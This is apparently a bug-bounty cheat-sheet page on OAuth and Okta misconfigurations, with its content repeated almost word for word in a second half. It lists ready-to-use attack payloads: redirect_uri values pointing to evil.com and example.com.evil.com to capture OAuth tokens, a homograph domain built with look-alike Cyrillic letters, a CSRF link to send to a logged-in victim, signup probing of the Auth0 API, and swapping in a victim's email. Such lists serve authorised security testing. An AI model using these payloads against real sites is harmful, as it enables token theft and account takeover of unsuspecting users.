OAuth / Okta Misconfiguration

Okta Misconfiguration

The client_id and connection parameters, crucial to the system's environment, can be obtained through various methods. One approach involves intentionally attempting to authenticate with invalid credentials.

After acquiring the client_id and connection parameters, the next step involves verifying if the system supports registration through the Auth0 API. To do this, we initiate a POST request to "/dbconnections/signup"

Detection

In the SSO feature. For example the URL will be looks like this

https://example/signin?response_type=code&redirect_uri=https://callback_url/auth&client_id=FQ9RGtMkztAgmAApKOqACrBNq&state=7tvPJiv8StrAqo9IQE9xsJaDso4&scope=+profile+email+phone+group+role+resource

Exploit

https://www.target.com/login?client_id=123&redirect_url=https://www.target.com/redirect?redirect=1&url=https://www.zseano.com/

OAuth token stealing by changing redirect_uri and Use IDN Homograph
- Normal parameter
  &redirect_uri=https://example.com
- IDN Homograph
  &redirect_uri=https://еxamplе.com
If you notice, im not using the normal e
OAuth Token Re-use.
Improper handling of state parameter
To exploit this, go through the authorization process under your account and pause immediately after authorization. Then send this URL to the logged-in victim
- CSRF Attack
  <a href="https://example.com/authorize?client_id=client1&response_type=code&redirect_uri=http://callback&scope=openid+email+profile">Press Here</a>
Lack of origin check.

Open Redirection on redirect_uri parameter

Normal parameter
```
&redirect_uri=https://example.com
```

Open Redirect

&redirect_uri=https://evil.com
&redirect_uri=https://example.com.evil.com
etc.

If there is an email parameter after signin then try to change the email parameter to victim's one.
Try to remove email from the scope and add victim's email manually.
Check if its leaking client_secret

Resources

PreviousBypass Captcha Next2FA / OTP

Last updated 3 days ago

Was this helpful?

Okta Misconfiguration

Detection

In the SSO feature. For example the URL will be looks like this

https://example/signin?response_type=code&redirect_uri=https://callback_url/auth&client_id=FQ9RGtMkztAgmAApKOqACrBNq&state=7tvPJiv8StrAqo9IQE9xsJaDso4&scope=+profile+email+phone+group+role+resource

Exploit

https://www.target.com/login?client_id=123&redirect_url=https://www.target.com/redirect?redirect=1&url=https://www.zseano.com/

OAuth token stealing by changing redirect_uri and Use IDN Homograph

Normal parameter
```
&redirect_uri=https://example.com
```
IDN Homograph
```
&redirect_uri=https://еxamplе.com
```

If you notice, im not using the normal e

Create an account with with normal functionality. Create account with using OAuth functionality. Now try to login using previous credentials.

OAuth Token Re-use.

Improper handling of state parameter

To exploit this, go through the authorization process under your account and pause immediately after authorization. Then send this URL to the logged-in victim

CSRF Attack

<a href="https://example.com/authorize?client_id=client1&response_type=code&redirect_uri=http://callback&scope=openid+email+profile">Press Here</a>

Lack of origin check.

Open Redirection on redirect_uri parameter

Normal parameter
```
&redirect_uri=https://example.com
```

Open Redirect

&redirect_uri=https://evil.com
&redirect_uri=https://example.com.evil.com
etc.

If there is an email parameter after signin then try to change the email parameter to victim's one.

Try to remove email from the scope and add victim's email manually.

Check if its leaking client_secret